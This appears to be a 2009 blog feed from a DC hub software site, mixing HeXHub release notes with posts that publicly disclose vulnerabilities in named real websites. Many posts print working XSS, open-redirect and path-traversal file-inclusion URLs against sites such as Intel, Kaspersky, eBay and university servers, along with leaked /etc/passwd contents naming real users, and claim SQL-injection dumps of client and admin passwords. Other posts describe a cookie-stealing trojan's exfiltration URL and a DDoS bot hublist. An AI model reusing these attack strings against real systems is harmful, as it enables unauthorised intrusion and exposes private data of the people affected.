nemesis.te-home.net

http://www.cromnet.ro Vulnerable to SQL Injection

Wed, 21 Jan 2009 17:08:50 GMT

New plugin for HeXHub: CmdSpy, a plugin that notifies the hub owner about the use / attempt to use o ...

Thu, 22 Jan 2009 17:52:28 GMT

New plugin for HeXHub: CmdSpy, a plugin that notifies the hub owner about the use / attempt to use of available commands.

Abdul DC Bot version 1004 released, including new filter plugin.

Sat, 24 Jan 2009 22:26:46 GMT

Abdul DC Bot version 1004 released, including new filter plugin.

http://www.goldhost.ro Romanian Hub Hosting XSS Bug

Sun, 25 Jan 2009 19:25:20 GMT

http://www.goldhost.ro Romanian Hub Hosting XSS Bug

Log with IP changes for Downadup domain list

Thu, 29 Jan 2009 21:00:20 GMT

Log with IP changes for Downadup domain list

http://www.romaniairc.org Vulnerable to SQL Injection

Sun, 1 Feb 2009 20:42:14 GMT

http://www.romaniairc.org Vulnerable to SQL Injection

http://kinder.lx.ro Vulnerable to SQL Injection

Thu, 5 Feb 2009 10:03:59 GMT

http://kinder.lx.ro Vulnerable to SQL Injection

http://linuxdcpp.berlios.de LinuxDC Vulnerable to Cross Site Scripting

Thu, 5 Feb 2009 18:21:48 GMT

http://linuxdcpp.berlios.de LinuxDC Vulnerable to Cross Site Scripting

Thu, 5 Feb 2009 18:23:56 GMT

http://linuxdcpp.berlios.de LinuxDC Vulnerable to Cross Site Scripting

http://www.realtimeinfo.roo Vulnerable to SQL Injection

Sun, 8 Feb 2009 20:11:25 GMT

http://www.realtimeinfo.roo Vulnerable to SQL Injection

SQL Injection Bug On Bitdefender Thailanda Website

Mon, 9 Feb 2009 22:46:24 GMT

SQL Injection Bug On Bitdefender Thailanda Website

VNC Spanish Server Pwned

Mon, 16 Feb 2009 14:19:31 GMT

VNC Spanish Server Pwned

F-Secure still Not Secure

Tue, 17 Feb 2009 21:30:26 GMT

F-Secure still Not Secure

= Kaspersky still Insecure? =

Sun, 22 Feb 2009 20:33:43 GMT

= Kaspersky still Insecure? =

http://audioannex.com Vulnerable to Remote File Inclusion

Mon, 23 Feb 2009 11:30:02 GMT

http://audioannex.com Vulnerable to Remote File Inclusion

http://www.moneytransfer.ie Vulnerable to SQL Injection

Tue, 24 Feb 2009 17:11:28 GMT

http://www.moneytransfer.ie Vulnerable to SQL Injection

Log with IP changes for Downadup domain list, february update

Tue, 24 Feb 2009 17:50:11 GMT

Log with IP changes for Downadup domain list, february update

Website Update

Wed, 25 Feb 2009 17:56:56 GMT

        This website is now hosted with HeXHub 5.03. Many errors were corrected and many new features were added. Hopefully, in the near future HeXHub will become the first forum/blogging software written entirely in asm, without the need of any 3rd party libraries or software installs. Making a new forum will not require any scripting, but simple HTML and very few HeXHub macro calls.
        If you make new templates that use HeXHub's new features, and you want them to be shared on this website and on HeXHub's sourceforge project page, let us know.
        Currently, version 5.03 of HeXHub is a beta, so until a stable version will be posted on this website use version 5.02c. Don't forget to subscribe to our RSS feed.

Intel Security Center Has NO Security

Wed, 25 Feb 2009 19:17:12 GMT

Intel Security Center Has NO Security

Nothing new ,all websites have same bug and it's enough to search for them

XSS

Code:

http://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00012&languageid=en-fr}">

Iframe Injection

I can say LoL

Redirect

Code:

http://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00012&languageid=en-fr}"

New Forum

Sat, 28 Feb 2009 08:58:49 GMT

This website was updated to use some of HeXHub's new features. We have a new forum. You can use the account you have on our public hub on this website and on our forum. Web registration for new users on this website remains easy, with no CAPTCHA or e-mail validation required, but this may change as we see spammers trying to abuse it. For posted links a "rel=nofollow" is added if your account doesn't have spam1 right. However, the hub increases access level with each new post and after 100 posts your account is upgraded to a profile that has spam1 right.
Making a new forum is easy but there is no wizard or configuration tool yet (online or offline). All forum related functions are handled by the hub itself so no scripting is needed, only HTML. The new default template for version 5.03 (which will be updated in the next days) is a small forum that uses the newly added functions.
Forum support is only at the beginning, and many forum features need to be added. And they will be added if needed (that deppends on how many people will actually use HeXHub to host blogs or forums or how many people will use our new forum).

Germanamericanbancorp.com - Vulnerable to xss

Sun, 1 Mar 2009 17:35:50 GMT

Code:

http://www.germanamericanbancorp.com/index.php?page=business_banking&bid=">

Crue.isi.edu - LFI

Tue, 3 Mar 2009 08:37:20 GMT

Code:

http://crue.isi.edu/cgi-bin/page.cgi?page=/../../../../../../../../../../../../etc/hosts

Code:

http://crue.isi.edu/cgi-bin/page.cgi?page=../../../../../../etc/passwd

Quote:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh dhcp:x:100:101::/nonexistent:/bin/false syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false mysql:x:103:106:MySQL Server,,,:/var/lib/mysql:/bin/false bind:x:104:109::/var/cache/bind:/bin/false phototest:x:1000:1000:Yu-Han Chang,,,:/home/phototest:/bin/bash sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin jeffsu:x:1001:1001::/home/jeffsu:/bin/bash btr:x:1002:1002::/home/btr:/bin/sh ychang:x:1003:1003::/home/ychang:/bin/sh isi:x:1004:1004::/home/isi:/bin/sh crue:x:1005:1005::/home/crue:/bin/sh Debian-exim:x:106:112::/var/spool/exim4:/bin/false smmta:x:107:115:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:108:116:Mail Submission Program,,,:/var/lib/sendmail:/bin/false scottswood:x:1006:1006::/home/scottswood:/bin/tcsh lara:x:1007:1007::/home/lara:/bin/tcsh travis:x:1009:1010::/home/travis:/bin/tcsh gregg:x:1010:1011::/home/gregg:/bin/tcsh superask:x:1011:1012::/home/superask:/bin/tcsh haaaa:x:1012:1013::/home/haaaa:/bin/tcsh

Sci.nctu.edu.tw - Local File Inclusion

Tue, 3 Mar 2009 08:49:28 GMT

Code:

http://sci.nctu.edu.tw/index.php?now=maga&page=/../../../../../../../../../../../../etc/hosts

Code:

http://sci.nctu.edu.tw/index.php?now=maga&page=/../../../../../../../../../../../../etc/passwd

Quote:

# $FreeBSD: src/etc/hosts,v 1.16 2003/01/28 21:29:23 dbaker Exp $ # # Host Database # # This file should contain the addresses and aliases for local hosts that # share this file. Replace 'my.domain' below with the domainname of your # machine. # # In the presence of the domain name service or NIS, this file may # not be consulted at all; see /etc/nsswitch.conf for the resolution order. # # ::1 localhost localhost.my.domain 127.0.0.1 localhost localhost.my.domain # # Imaginary network. #10.0.0.2 myname.my.domain myname #10.0.0.3 myfriend.my.domain myfriend # # According to RFC 1918, you can use the following IP networks for # private nets which will never be connected to the Internet: # # 10.0.0.0 - 10.255.255.255 # 172.16.0.0 - 172.31.255.255 # 192.168.0.0 - 192.168.255.255 # # In case you want to be able to connect to the Internet, you need # real official assigned numbers. Do not try to invent your own network # numbers but instead get one from your network provider (if any) or # from your regional registry (ARIN, APNIC, LACNIC, RIPE NCC, or AfriNIC.) #/quote]

Other Bad Security Settings on Kaspersky's Websites

Tue, 3 Mar 2009 13:50:49 GMT

Other Bad Security Settings on Kaspersky's Websites

kasperskylabs.ir web.kaspersky.com.tw and http://www.kasperskymall.co.kr Still Insecure

SQL iNJECTION

-------------------------------------------------------------

XSS and Iframe url Injection

Code:

http://www.kasperskylabs.ir/fa/f_q/f&q.asp?search=">

Code:

http://www.kasperskylabs.ir/fa/f_q/f&q.asp?search=">

-------------------------------------------------------------

Forum signatures

Thu, 5 Mar 2009 20:08:45 GMT

All accounts have a "reason / comment" field that by default is used to store the reason when the user is banned. But when the user is unbanned the reason for last ban remains. So I added a new option to allow users to change their "reason / comment" (which now is "reason / comment / signature") and to use that as a signature when posting comments (when the topic page shows %[signature]).
The signature can have BBCode and all BBCode restrictions for a topic also apply to it. Here, for example, all image hosts are allowed in Unmoderated Area, but on most other forums there is a restriction for image hosts to allow only imageshack, photobucket and postimage.org.
Also, some problems with HeXHub login pages (/login?*) were corrected so they no longer redirect to themselves if sending Referer is not disabled in client.
For those who like hub ASCII art, there is a new forum where they can be posted and they should look like in a NMDC client with default settings. If some of your settings are different, use [font] / [size] / [b] / [i] / [u] tags to make your image look like in your client. Be sure you get the correct font name (there is a difference between "Microsoft Sans Serif" and "MS Sans Serif" for example).

HeXHub 5.03

Sun, 8 Mar 2009 21:46:54 GMT

New release of HeXHub - version 5.03.

Changes:

corrected: if maximum number of characters is specified in %[message] it no longer includes HTML tags
corrected: the character "[" could not be posted in comments unless using a [code] tag
corrected: the "+" character could not be used in variabiles and comments because its escaping (%2B) was replaced with a space
corrected: error while showing %[isp] in MOTD if no ISP was declared (thanks to RoLex for reporting this error)
corrected: some bans had an ending pipe in reason (thanks to RoLex for reporting this error)
corrected: login cookies were not set if a port was used in address
corrected: if a browser sent same address as referer, the hub was using it as return page from its default pages (thanks to RoLex for reporting this error)
corrected: error while removing items from BBCode stack (thanks to RoLex for reporting this error)
corrected: error while testing for forbidden image hosts in [img] tag (thanks to RoLex for reporting this error)
corrected: [size], [color] and [font] were expecting spaces and not "=" (thanks to RoLex for reporting this error)
corrected: unfinished [url] tag truncated the message (thanks to RoLex for reporting this error)
corrected: [code] and [quote] were affected by styles set for table borders
corrected: to enable the "upload limit" edit the dialogbox needed to be re-opened after checking the upload limit checkbox (thanks to RoLex for reporting this error)
corrected: error while parsing POST form data (thanks to RoLex for reporting this error and for helping with tests)
added: new options to notify about posting comments in mainchat and in opchat
added: new option to increase access level of registered users who post comments after every new post (the user can be upgraded to another profile that has adm0 right and the access level of the new profile completes an access level range with current profile)
added: %[date format] and %[time format] for user commands, raw messages and web macros (requested by RoLex)
added: new option to disable "DC to web" conversion for extended ASCII characters (thanks to Stomatolog and RoLex for showing this problem)
users can change their "reason / comment" field for their account to set a signature that may be shown in their comments (%[signature])
web reports can be saved to log
%[var] has additional verifications to prevent abuse (thanks to Methodman for tests)
firewall bans are now temp bans using default time set for kicks (requested by RoLex)
new macros: %[include], %[update], %[kauthor], %[kauthorip], %[kmsgdate], %[kmsgtime], %[kmessage], %[title], %[link] and %[posts]
new keyword in %[cdata]: update:key:filename, if this is present the hub will search and update all %[update]%[/update] and labels in one or more specified files, where a key will match a posted comment or topic.
posted images that are not in an anchor are linked to their host
the forbid was updated with new strings (thanks to RoLex)
the reason field from account information is also used to store user's signature for comments (thanks to RoLex for testing this new feature)

Void passwords

Sun, 8 Mar 2009 22:11:51 GMT

Accessing "Your Account" page caused password reset for browsers that had the auto-complete feature enabled (the old password was entered by browser, but nothing was entered for new password / re-enter password). This caused some accounts to have void password and to be inaccessible. All those accounts were deleted and a new restriction prevents setting void passwords.
If you saw the message "invalid password" when trying to log in, you will have to re-register. Sorry for this inconvenience.

Kaspersky Returns

Wed, 11 Mar 2009 17:30:18 GMT

New XSS bug On Italian Kaspersky - store

This is not the first time,however we hope that they look at my email and fix these bugs soon

http://www.kasperskystore.it

Also the redirect works fine

Code:

Spammers spread VKontakte.ru password stealing trojans on DC hubs

Fri, 13 Mar 2009 08:08:29 GMT

A spammer is spreading password stealing trojans for vkontakte.ru accounts.

Hub-Security wrote:

[04:46] From IP: 80.73.6.129, nick: downloadplease - Forbidden word(s) "http" found in mainchat message - "http://depositfiles.com/ru/files/4j40ii4nh - cool programm for download free files of all sites. Download 1.9 mb"

The file proga_dlya_vkontakte_VKLife.exe is a trojan from Pro-EXESoftware Company which is a trojan seller so this one will probably also not be detected by any antivirus (antiviruses don't detect commercial trojans). This trojan is similar to another well known russian application called VKlife and it sends login cookies for vkontakte.ru to http://www.pro-exe.com/vkontakte/unsavedvideo_log.php?sv=%[cookies] . It also contacts a list of users using the following links: http://vkontakte.ru/id11637808 , http://vkontakte.ru/id4955122 , http://vkontakte.ru/id2689314 , http://vkontakte.ru/id434723 .
The website pro-exe.com is well known for hosting fake login pages for vkontakte.ru. More information can be found here: http://uvidim.com/?p=71.

HeXHub 5.03a

Sun, 15 Mar 2009 00:37:29 GMT

New release of HeXHub - version 5.03a.
Changes:

corrected: error while showing banlist using /bans (thanks to Methodman for reporting this error)
corrected: the hub did not escape the '&' character correctly when using %[motd] (thanks to RoLex for reporting this error)
corrected: extended ASCII characters had wrong escaping when they were used in topic names (thanks to Neo and RoLex for reporting this error)
corrected: error while using %[userprofile] (thanks to RoLex for reporting this error)
added: support for "Ref=" sent in $Lock in a client2client negotiation

Latest versions of most popular clients (DC++, StrongDC++, ApexDC++) implement a new protocol extension, they send the referrer hub in a client2client negotiation (the hub where the $ConnectToMe was sent that caused the client2client connection). This allows a better accuracy for detecting the hubs used in a DDoS attack. The main difference between a good hublist identification and referred hubs is, the hublists have only one address for same hub.

Hub-Security wrote:

[02:21] DDoS detected, gathering attack information...
[02:22] Attacker found in hub: dchub://dchub.hacker.lv:4012
[02:22] Port: 47534, flood rate: 42.09 connections/sec. (2525.62 connections/min.), number of different IPs filtered: 1565, most frequent country: LV=Latvia
        The attacker is exploiting the following hubs:
                hub.hacker.lv:4012
                dchub.hacker.lv:4012
                193.41.195.21:4012
[02:23] Port: 47534, flood rate: 57.85 connections/sec. (3471.56 connections/min.), number of different IPs filtered: 2314, most frequent country: LV=Latvia
[02:24] Port: 47534, flood rate: 90.90 connections/sec. (5454.37 connections/min.), number of different IPs filtered: 3001, most frequent country: LV=Latvia
        The attacker is exploiting the following hubs:
                dcHub.hacker.lv:4012

The result from hublist searches is shown as "Attacker found in hub", referrers sent by clients are shown as "The attacker is exploiting the following hubs". All addresses point to the same hub.

Hublists Used by DDoS Bots

Sun, 15 Mar 2009 12:11:06 GMT

This is the defaul hublist used by Supernova 5. Anyway 99% hubs don't work anymore.

Quote:

fairplay.myip.hu:8750
footballfactory.myip.hu:1899
koris-hub.no-ip.info:1980
hungarydc.myip.hu:3456
izekee.myip.hu:3000
shunshine.myip.hu:2008
angel-hub.no-ip.org:1987
musikhub.myip.hu:1456
cobweb.thecobwebnet.net:765
hypergames.sytes.net:7777
princess.ciupi.ro
mp3-music.sytes.net:6969
galeone.spqr-net.net:4110
dc.bol.bg
hub.ilva.lv
monopolowy.org:6969
pronovacky.com
hubanafra.net
hub.p-p-h.pl:8500
mp3world.sytes.net:6969
viziati.bounceme.net:1411
BilliardsClub.no-ip.info
dc3.speednet-se.net:2006
rettenet.sytes.net:1666
besthub.ro
forza-rapid.no-ip.biz:4012
hub1.cyberspace.ro
DcHub.Kaktuss.Lv
dc.bol.bg:411
devilshideout.adrenaline-network.com:6666
dc.data.bg
hubanafra.net:411
second.hubanafra.net
dchub.hacker.lv:4012
x.ciupi.ro
crazyhub.clax.ro
forza-rapid.no-ip.biz:4012
dc.pikenet.ru:4111
hub.p-p-h.pl:8500
viziati.bounceme.net:1411
besthub.ro
fairplay.myip.hu:8750
koris-hub.no-ip.info:1980
fairplay.myip.hu:8750
footballfactory.myip.hu:1899
koris-hub.no-ip.info:1980
hungarydc.myip.hu:3456
izekee.myip.hu:3000
shunshine.myip.hu:2008
angel-hub.no-ip.org:1987
musikhub.myip.hu:1456
cobweb.thecobwebnet.net:765
hypergames.sytes.net:7777
princess.ciupi.ro
mp3-music.sytes.net:6969
galeone.spqr-net.net:4110
dc.bol.bg
hub.ilva.lv
monopolowy.org:6969
pronovacky.com
hubanafra.net
hub.p-p-h.pl:8500
mp3world.sytes.net:6969
viziati.bounceme.net:1411
BilliardsClub.no-ip.info
dc3.speednet-se.net:2006
rettenet.sytes.net:1666
besthub.ro
forza-rapid.no-ip.biz:4012
hub1.cyberspace.ro
DcHub.Kaktuss.Lv
dc.bol.bg:411
devilshideout.adrenaline-network.com:6666
dc.data.bg
hubanafra.net:411
second.hubanafra.net
dchub.hacker.lv:4012

Microsoft Lottery™ Strikes Again

Sun, 15 Mar 2009 14:02:46 GMT

This time in Romania. All newspapers and televisions say there is a new virus called "Downadub" that was used by hackers to delete databases from romanian prisons. While the virus is not new, the mispelling for its name is.

http://www.ziarulring.ro/stiri/politica/atac_informatic_la_interne_si_justitie.html wrote:

"Baza de date informatizat� de la Rahova a fost distrus�. Din fericire, datele nu s-au pierdut, le avem �i �n format clasic, pe h�rtie. Acum trebuie s� reintroducem aceste date �n calculatoare�, a precizat B�la.

Translation: "The database from Rahova has been destroyed. Fortunately, there was no data loss, we have everything on papers. Now we have to re-enter all the data to our computers." says Ioan B�la (the director of one of these prisons).

http://www.google.com/search?q=%22boala+digitala%22+microsoft wrote:

"Boala digital�, a�a cum a fost poreclit virusul Downadub, a atins sistemul informativ al ANP �nc� de acum dou� s�pt�m�ni. Pe l�ng� faptul c� a �ngreunat teribil �i, �n unele cazuri, a blocat complet re�elele de calculatoare din mai multe �nchisori, virusul a distrus chiar �i mai multe baze de date cu de�inu�i.

Translation: "The digital disease", as Downadub virus was nicknamed, reached the ANP systems from two weeks ago. Besides the difficulties caused, and the fact that in some cases it completely blocked the computer networks of several prisons, the virus destroyed even several databases with detainees.

First of all, it's "Downadup", not "Downadub". And it is a worm, not a virus. More details about the analysis of its code can be found here: http://mtc.sri.com/Conficker. There are no functions in it that can alter databases. There are no functions in it that delete files. The only payload it has is to download and execute a file. The file must be digitally signed so to make it execute the file, you need to know the private key. It randomly generates 250 domain names daily and you can download a .zip file with all these domains until June 30th from the Microsoft Security Response Center. Until security companies registered all of them, we have logged all IP changes for estimated domains (1, 2). To make the virus download an executable file someone has to register one of these domains. But all estimated domains are already registered by security companies.

It's time to make a new lottery.

http://www.ziua.ro/news.php?data=2009-03-13&id=23255 wrote:

In trecut, Antena 3 a informat ca Microsoft a anuntat ca ofera o recompensa de 250.000 de dolari persoanei care poate furniza informatii ce vor duce la arestarea si condamnarea creatorilor viermelui informatic Conficker.

Tot in trecut, Antena3 a anuntat ca dupa ce a anuntat ca ofera o recompensa de 250.000 de dolari persoanei care poate ajuta la condamnarea creatorilor viermelui informatic Conficker, Microsoft ofera acceasi suma de bani oricui poate furniza informatii despre cei care celor au spart reteaua de calculatoare a Administratiei Nationale a Penitenciarelor (ANP).

Translation: In the past, Antena 3 has informed that Microsoft has announced that it offers a reward of 250,000 dollars to a person who can provide information that will lead to the arrest and conviction of Conficker worm creators. Also in the past, Antena3 announced that after it announced that it offers a reward of 250,000 dollars to a person who can help sentencing the creators of Conficker worm, Microsoft offers an equal amount of money to anyone who can provide information about those who have broken the network of computers of National Administration of Penitentiaries (ANP).

There are many known security problems caused by hackers to companies, government servers, military servers, etc. Databases get stolen and deleted all the times. But Microsoft doesn't offer any reward for any other unsolved cases unless they involve the romanian penitentiaries. Can you believe that ?

The451Group - Full Disclosure

Mon, 16 Mar 2009 12:19:48 GMT

http://www.the451group.com

Quote:

The 451 Group is an independent technology-industry analyst company that was founded in 2000, and has offices in the US and Europe.
Our research makes sense of swiftly moving trends in the industry creating information technologies (IT) used by large and midsized organizations.

Critical Sql injection was found on their website,and here I show you some info and screen.
The webmaster has been alerted about this and we hope that they fix these bugs soon.

All Table Names From Database

Quote:

Database 451ecommerce

    Table access  ( Rows)]
    Table authmap  ( Rows)]
    Table blocks  ( Rows)]
    Table blocks_roles  ( Rows)]
    Table boxes  ( Rows)]
    Table cache  ( Rows)]
    Table cache_content  ( Rows)]
    Table cache_filter  ( Rows)]
    Table cache_menu  ( Rows)]
    Table cache_page  ( Rows)]
    Table cache_workflow_ng  ( Rows)]
    Table cclink_schedules  ( Rows)]
    Table comments  ( Rows)]
    Table content_field_image_cache  ( Rows)]
    Table content_type_page  ( Rows)]
    Table content_type_product  ( Rows)]
    Table content_type_story  ( Rows)]
    Table devel_queries  ( Rows)]
    Table devel_times  ( Rows)]
    Table file_revisions  ( Rows)]
    Table files  ( Rows)]
    Table filter_formats  ( Rows)]
    Table filters  ( Rows)]
    Table flood  ( Rows)]
    Table history  ( Rows)]
    Table imagecache_action  ( Rows)]
    Table imagecache_preset  ( Rows)]
    Table menu  ( Rows)]
    Table node  ( Rows)]
    Table node_access  ( Rows)]
    Table node_comment_statistics  ( Rows)]
    Table node_counter  ( Rows)]
    Table node_field  ( Rows)]
    Table node_field_instance  ( Rows)]

Database Information

MySQL User Password

Securityspace Redirect

Tue, 17 Mar 2009 12:39:14 GMT

Code:

http://www.securityspace.com/../secnews/redir.html?URL=http://nemesis.te-home.net

Networkworld Redirect

Tue, 17 Mar 2009 12:45:22 GMT

Code:

http://www.networkworld.com/search/searchresults.html?qt=pc&hpg1=sb&search="">>>> ""

IRC to NMDC

Sat, 21 Mar 2009 19:41:49 GMT

        IRCtoNMDC is a program that converts one or more IRC channels from different IRC networks to local "virtual hubs" that can be joined by NMDC clients and bots. Each IRC channel is seen as a separate hub so a different port must be set for every added channel.
        All supported IRC features are added as user commands to user menus and hub menus. Also, NickChange is supported (if the client does not support NickChange, it is emulated).
        In version 1.00 many IRC specific features are not supported and there is no flood / spam detection. File sharing between IRC clients and NMDC clients is not yet implemented.
        Project homepage: IRC to NMDC

QSDChublist.com Updated

Sun, 22 Mar 2009 00:59:56 GMT

During the past few weeks we have been working on a few updates to make the hublist look better and be more useful for you the users. This is what we have done so far:

Updated: New Design
Updated: A few MySQL queries to make the website use less resources.
Added: GZIP Support
Added: Hubsoft in Usersearch
Added Hubsoft in Hubsearch
Added Multilanguage system in Hubs/Usersearch/Hubdetails/FAQ/Home. Note: This feature requires cookies to be activated.
Added: Information on FAQ
Added: Address in Usersearch results
Removed: Userlist from hubdetails.

New languages:

Swedish - by Molotov
Danish - by Anonymous
Romanian - by The_Architect
Spanish - by The_Architect

Project homepage: www.QSDCHublist.com

QSDChublist.com Bugfixes

Sun, 22 Mar 2009 20:42:26 GMT

Corrected: XSS cross site scripting fixed in Language system (Reported by Methodman)
Corrected: Vulnerability to file inclusion (Reported by Methodman)

Project homepage: www.Qsdchublist.com

Telecomsite.nl - SQL iNJECTION

Tue, 24 Mar 2009 20:13:35 GMT

Full sql injection on http://telecomsite.nl

Database information

Client name ,email and password

Admin name and password

XSS on Worldbank.org

Tue, 24 Mar 2009 20:22:59 GMT

http://masetto.worldbank.catchword.org xss vulnerability and redirect

Code:

http://titania.worldbank.catchword.org/vl=2662207/cl=20/nw=1/rpsv/cgi-bin/activate.pl?cfg=">

Code:

http://masetto.worldbank.catchword.org/vl=2039499/cl=23/nw=1/rpsv/cgi-bin/activate.pl?cfg=

Code:

http://titania.worldbank.catchword.org/vl=2662207/cl=20/nw=1/rpsv/cgi-bin/activate.pl?cfg='>

Anewcreditcard.co.uk XSS bug

Tue, 24 Mar 2009 20:29:44 GMT

http://www.anewcreditcard.co.uk

Code:

http://www.anewcreditcard.co.uk/credit-card-details.php?id=13&card-name=">/code]

Vulnerable also to SQL Injection

[code]http://www.anewcreditcard.co.uk/credit-card-details.php?id=13'

Quote:

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/sites/anewcreditcard.co.uk/public_html/includes/query2.php on line 14
Couldn't execute query

Wingate - Sql Injection

Tue, 24 Mar 2009 20:59:11 GMT

http://www.wingate.com

Unibg.it - LFI

Wed, 25 Mar 2009 10:40:37 GMT

Code:

http://www02.unibg.it/~medusa/index.php?pag=../../../../etc/passwd%00

Quote:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin brugo:x:500:500::/home/brugo:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash digitalid:x:501:501::/home/digitalid:/bin/sh brugoweb:x:502:502::/home/brugoweb:/bin/sh ilias:x:503:503::/home/ilias:/bin/sh db:x:504:504::/home/db:/bin/bash streamrep:x:505:505::/home/streamrep:/bin/sh morin:x:506:506::/home/morin:/bin/sh operalib:x:507:507::/home/operalib:/bin/sh francese:x:508:508::/home/francese:/bin/sh karascio:x:509:509::/home/karascio:/bin/sh podcast:x:510:510::/home/podcast:/bin/sh lazzaristat:x:511:511::/home/lazzaristat:/bin/sh ibm:x:512:512::/home/ibm:/bin/bash medusa:x:513:513::/home/medusa:/bin/sh matnet:x:514:514::/home/matnet:/bin/sh stats:x:515:515::/home/stats:/bin/sh migranti:x:516:516::/home/migranti:/bin/sh icsbellano:x:517:517::/home/icsbellano:/bin/bash

Hubpinger.ro - XSS -Iframe url injection

Sun, 29 Mar 2009 20:01:51 GMT

Code:

http://www.hubpinger.ro/rezultate_cautare.php?q=">

Code:

http://www.hubpinger.ro/rezultate_cautare.php?q=>

Clax.ro -SQL Injection

Sun, 29 Mar 2009 20:19:09 GMT

Turnkey Ebook Store v1.1 - XSS + Redirect

Tue, 31 Mar 2009 11:31:21 GMT

http://www.privatelabelresellrights-store.com/ebookstore/

example:

- http://site.com/index.php?cmd=search&keywords=">

- http://site.com/index.php?cmd=search&keywords=

live:

- http://1dollar-ebookstore.com/index.php?cmd=search&keywords=">

Google dork: - Powered by Turnkey Ebook Store v1.1

Multiple Bugs On EBAY.CO.UK Website

Fri, 3 Apr 2009 12:43:53 GMT

XSS and Iframe URL Injection

Malicious people can inject JavaScript code to redirect users to eBay scam pages (phishing attacks)





- Redirect to others url works fine also

Local File Inclusion   ( traversal attacks )

Attackers use directory traversal attacks to read arbitrary files on web servers, such as SSL private keys and password files.

The webmaster has been alerted about this BUT I have not received any response,so maybe all bugs still works !

ssnet.ro - XSS

Sat, 4 Apr 2009 12:47:30 GMT

Code:

http://www.ssnet.ro/cart.php?a=add&pid=">/code]

caffedelmar.ro VHC - LFI

Tue, 7 Apr 2009 15:47:17 GMT

Code:

http://www.caffedelmar.ro/cafe/?page=../../../../../../etc/passwd%00

Quote:

Gantep.edu.tr

Tue, 7 Apr 2009 15:50:47 GMT

Code:

http://www1.gantep.edu.tr/~andrew/ep208/exercises?lecture=../../../../../../etc/passwd%00

Quote:

root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/log:/bin/false lp:x:4:7:lp:/var/spool/lpd:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/:/bin/false news:x:9:13:news:/usr/lib/news:/bin/false uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false operator:x:11:0:operator:/root:/bin/bash games:x:12:100:games:/usr/games:/bin/false ftp:x:14:50::/home/ftp:/bin/false smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/:/bin/false gdm:x:42:42:GDM:/var/state/gdm:/bin/bash apache:x:80:80:User for Apache:/srv/httpd:/bin/false messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false pop:x:90:90:POP:/:/bin/false nobody:x:99:99:nobody:/:/bin/false template:x:11204:100::/home/template:/bin/bash andrew:x:1001:100:Dr Andrew Beddall,206,ext 2206/2202,Engineering Physics:/home/andrew:/bin/bash c_dikici:x:1073:100:Celal Dikici,BIM,ext 1951,Industry 